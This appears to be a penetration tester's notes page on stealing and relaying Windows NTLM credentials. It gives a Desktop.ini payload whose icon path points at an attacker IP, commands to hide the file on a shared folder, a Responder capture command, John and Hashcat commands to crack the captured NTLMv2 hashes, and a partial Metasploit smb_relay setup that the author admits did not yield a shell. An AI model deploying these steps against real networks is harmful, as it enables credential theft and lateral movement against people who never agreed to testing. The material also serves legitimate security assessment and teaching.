NTLM Relaying and Theft

TLDR#

Background#

Goal: Steal NTLM-hash or a challenge-response handshake.
Goal: Perform a relay attack to authenticate against a server.

There are many ways to trick computers into sending the authenticated user's NTLM hashes.

Desktop.ini files#

Find a commonly used share where your user has write permissions. See SMB Shares Mining for how to find writable shares. The folder cannot be the root-folder of the share. So if you have write-access to the root of the share you can just create a folder there.

Name the folder 0Dcouments or something like that. If the folder that is writable contains many folders the folder lower down won't be "rendered" until the user scrolls down. So naming you folder somthing with a 0 garantes that it will be rendered early.

Create desktop.ini file on an SMB-share used by other users. Viewing the share in explorer will cause a request for a resource, allowing the capture or relay of NTLM-challenge responses.

Filename: Desktop.ini

[.ShellClassInfo]
IconFile=\\10.13.37.100\test\test.ico
IconIndex=0

The folder in which the Desktop.ini file in needs to be configured with the system flag.

attrib +s <path-to-folder>

We need to now also set desktop.ini to be hidden and system before windows will respect it.

attrib +s +h desktop.ini

Placing this on a commonly visited network share, will trick the victim's computer into authenticating towards the specified IP. This can be used in NTLM-relaying attacks, or to steal the challenge-response and run hashcat on it

Capture Challenge Response and Crack the Hash#

When the victim enters the share the victim machine will try to authenticate to your attacker-machine, and using responder we can retreive the NTLM hash of the victim.

IMPORTANT DO NOT RUN RESPONDER WITHOUT the -A flag unless you know what you are doing
It will poison and other suff. -A will make it passive, analyzing mode.

responder -v -A -I eth0

Now once responder has recorded the challenge/response it is stored in a logfile found here (on kali):

/usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.66.10.txt

If you don't want to use responder you can use tcpdump, and the use pcredz. It will find the authentications that are used. Not sure how well it works with challenge-response though.

Cracking the Hash#

With John:

john SMB-NTLMv2-SSP-192.168.66.10.txt --wordlist=/usr/share/wordlists/rockyou.txt

With Hashcat:

hashcat -m 5600 -a 3 --force /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.66.10.txt /usr/share/wordlists/rockyou.txt

Relaying#

Metasploit

use windows/smb/smb_relay


# SMBHOST  192.168.66.88    no        The target SMB server (leave empty for originating system)

set SMBHOST <ANY host that you think the user has Admin access to>

# Set the payload you want

The authentication actually worked but I got no shell when I tested it. Not sure why.

Impacket

The same thing can be done with impacket.

If no command is entered the default behaviour is to dump all the users hashes if the authenticated user is an administrator of course.